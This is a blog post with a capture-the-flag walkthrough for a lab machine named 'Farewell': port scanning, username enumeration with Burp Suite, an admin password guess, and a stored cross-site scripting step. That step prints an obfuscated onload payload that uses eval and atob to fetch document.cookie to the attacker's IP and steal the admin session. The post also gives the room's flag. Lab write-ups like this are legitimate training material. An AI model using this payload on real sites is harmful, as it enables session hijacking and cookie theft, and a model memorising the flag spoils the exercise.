<!DOCTYPE html>
<html lang="ro-ro">
<head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">Farewell | Cyber Blog-ul lui Novac</title>
<meta property="og:title" content="Farewell | Cyber Blog-ul lui Novac" />
<meta name="twitter:title" content="Farewell | Cyber Blog-ul lui Novac" />
<meta itemprop="name" content="Farewell | Cyber Blog-ul lui Novac" />
<meta name="application-name" content="Farewell | Cyber Blog-ul lui Novac" />
<meta property="og:site_name" content="" />

<meta name="description" content="">
<meta itemprop="description" content="" />
<meta property="og:description" content="" />
<meta name="twitter:description" content="" />

<meta property="og:locale" content="ro-ro" />
<meta name="language" content="ro-ro" />

  <link rel="alternate" hreflang="en" href="https://novaclearnscyber.github.io/blog/posts/farewell/" title="" />





    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2026-01-21T12:49:33Z />
    <meta property="article:published_time" content=2026-01-21T12:49:33Z />
    <meta property="og:url" content="https://novaclearnscyber.github.io/blog/posts/farewell/" />

    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "Farewell",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2026-01-21",
        "description": "",
        "wordCount":  334 ,
        "mainEntityOfPage": "True",
        "dateModified": "2026-01-21",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "Cyber Blog-ul lui Novac"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.154.2">

    
    <meta property="og:url" content="https://novaclearnscyber.github.io/blog/posts/farewell/">
  <meta property="og:site_name" content="Cyber Blog-ul lui Novac">
  <meta property="og:title" content="Farewell">
  <meta property="og:description" content="Reconing Lets start with the basiscs to see what ports are open
lets scna the ports with nmap and sS flag for
-sS means Half-Open scan , is a scan quite fast and silent scan which scans for TCP SYN
https://en.wikipedia.org/wiki/Transmission_Control_Protocol
https://en.wikipedia.org/wiki/SYN
very basiscs ports open , ssh and https , lets check the site
nothing interesting here just a basic login page
apart from that we can find an interesting banner at the top of the site with some active users , maybe we can try some of the mfor the username">
  <meta property="og:locale" content="ro_ro">
  <meta property="og:type" content="article">
    <meta property="article:section" content="posts">
    <meta property="article:modified_time" content="2026-01-21T12:49:33+00:00">
    <meta property="article:tag" content="Note">
    <meta property="article:tag" content="Journal">
    <meta property="article:tag" content="CyberStuff">


    
    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="Farewell">
  <meta name="twitter:description" content="Reconing Lets start with the basiscs to see what ports are open
lets scna the ports with nmap and sS flag for
-sS means Half-Open scan , is a scan quite fast and silent scan which scans for TCP SYN
https://en.wikipedia.org/wiki/Transmission_Control_Protocol
https://en.wikipedia.org/wiki/SYN
very basiscs ports open , ssh and https , lets check the site
nothing interesting here just a basic login page
apart from that we can find an interesting banner at the top of the site with some active users , maybe we can try some of the mfor the username">


    

    <link rel="canonical" href="https://novaclearnscyber.github.io/blog/posts/farewell/">
    <link href="https://novaclearnscyber.github.io/blog/style.min.e390ba7da26222f4dc42a349955d76dbbe44e5ce2535a43de5a70633a0a9ec3c.css" rel="stylesheet">
    <link href="https://novaclearnscyber.github.io/blog/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="https://novaclearnscyber.github.io/blog/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://novaclearnscyber.github.io/blog/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://novaclearnscyber.github.io/blog/icons/favicon-16x16.png">
    <link rel="mask-icon" href="https://novaclearnscyber.github.io/blog/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="https://novaclearnscyber.github.io/blog/favicon.ico">




<link rel="manifest" href="https://novaclearnscyber.github.io/blog/site.webmanifest">

<meta name="msapplication-config" content="/blog/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">
    <meta name="color-scheme" content="light dark">

    
    <link rel="icon" type="image/svg+xml" href="https://novaclearnscyber.github.io/blog/icons/favicon.svg">

    
    
    
</head>


<body>
    <nav>
    <div class="logo">
        <a href="https://novaclearnscyber.github.io/blog/" title="Cyber Blog-ul lui Novac">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title></title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
    </div>
    
</nav>

    <style>
        :root {
            --banner-height: {
                    {
                    .Site.Params.banner_height | default "300px"
                }
            }

            ;
        }

        @media (max-width: 768px) {
            :root {
                --banner-height: 200px;
                 
            }
        }

        .custom-banner {
            width: 100%;
            height: var(--banner-height);
            overflow: hidden;
            position: relative;
        }
    </style>

    
    <div class="custom-banner">
        <div
            style="background-image: url('https://novaclearnscyber.github.io/blog/siteBackcopy.png'); width: 100%; height: 100%; background-size: cover; background-position: center;">
        </div>
    </div>
    

    <div id="content">
        
<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">Farewell</h1>
                
                
                
                <div class="post-meta">
                    <time datetime="2026-01-21T12:49:33&#43;00:00" itemprop="datePublished"> Jan 21, 2026 </time>
                </div>
                
            </header>
            
            <div class="page-content">
                <h1 id="reconing">Reconing</h1>
<p>Lets start with the basiscs to see what ports are open<br>
lets scna the ports with nmap and sS flag for<br>
-sS means Half-Open scan , is a scan quite fast and silent scan which scans for TCP SYN<br>
<a href="https://en.wikipedia.org/wiki/Transmission">https://en.wikipedia.org/wiki/Transmission</a>_Control_Protocol<br>
<a href="https://en.wikipedia.org/wiki/SYN">https://en.wikipedia.org/wiki/SYN</a></p>
<p><img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118094415.png" alt=""><br>
very basiscs ports open , ssh and https , lets check the site</p>
<p><img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118094453.png" alt=""><br>
nothing interesting here just a basic login page<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118145315.png" alt=""><br>
apart from that we can find an interesting banner at the top of the site with some active users , maybe we can try some of the mfor the username</p>
<p>lets try a basic subdir enumeration maybe something interesting show up</p>
<p><img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118100108.png" alt=""><br>
ok really good e have some good statussus here</p>
<p>lets try a burp suite interceptor</p>
<p><img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118101550.png" alt=""><br>
now lets try to log in with it<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118102022.png" alt=""><br>
i catch it and send it to the repeater and we see the error=auth_failed</p>
<p>trying a username from above and a random pass i get the following <img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118145649.png" alt=""><br>
lets try some other usernames to<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118145721.png" alt=""><br>
ok cool<br>
lets try also deliver11<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118145757.png" alt=""><br>
ok cool , this is the easieste password we can  get<br>
the capital of japan is Kyoto , so the formal will be KyotoXXXX where X is a digit</p>
<p>i guess we will try yo bruceforce it</p>
<p>Reconsidering it , taking in consideration the WAF , the bruteforce for the format XXXX will take quite some time so lets try something for admin</p>
<p>after a few trying a got lucky and found &ldquo;Farewell2025!&rdquo;</p>
<p>logining in with that pass we get<br>
<img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118150802.png" alt=""><br>
so there is the flag<br>
note: this will be the flag for a normal user</p>
<p>for the second flag we will try same aproach we used for the second WAF ctf , that being using eval and atob functions</p>
<p>the payload is</p>
<pre tabindex="0"><code>&lt;body onload=&#34;eval(atob(&#39;ZmV0Y2goJy8vMTkyLjE2OC4xNDUuNC8nK2RvY3VtZW50LmNvb2tpZSk=&#39;))&#34;&gt;
</code></pre><p>where the encodede part is :<br>
f<code>etch('//YourIP/'+document.cookie)</code></p>
<p>and by pasting the payload into the post section we get the second cookie just like that</p>
<p><img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118152529.png" alt=""></p>
<p><img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118152610.png" alt=""><br>
and by changing out cookie with that we get<br>
note u have the change the cookie in admin.php page</p>
<p><img src="https://novaclearnscyber.github.io/blog/images/blog-ul-meu/static/Pasted%20image%2020260118153156.png" alt=""></p>
<p>FLAG:THM{ADMINP@wned007}</p>

            </div>
        </article></main>
</div>

    </div>
    <footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
</div>
    <small class="footer_copyright">
        © 2026 .
        
    </small>
</footer>
</body>

</html>